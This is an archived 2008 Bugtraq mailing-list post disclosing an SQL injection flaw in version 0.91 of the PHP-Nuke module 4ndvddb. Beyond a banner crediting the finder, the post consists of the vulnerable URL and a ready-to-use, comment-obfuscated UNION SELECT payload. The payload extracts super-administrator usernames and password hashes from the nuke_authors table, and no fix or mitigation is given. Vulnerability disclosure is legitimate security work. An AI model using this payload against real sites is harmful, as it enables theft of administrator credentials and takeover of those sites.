lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list] 
Date: 7 Jul 2008 19:24:55 -0000
From: lovebug@...mail.it
To: bugtraq@...urityfocus.com
Subject: PHP-NUKE SQL Module's Name 4ndvddb

 Module's Name: 4ndvddb
 Module's Version: 0.91
 
+---------------------------------------+
|  SQL Injection Vulnerability PHP-NUKE 
  | Module's Name: 4ndvddb
|          Module's Version: 0.91     |
|         found by lovebug       |
|            RBT-4 |
            www.rbt-4.net
+---------------------------------------+


#vuln: modules.php?name=4ndvddb&rop=show_dvd&id=

#sql= 1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux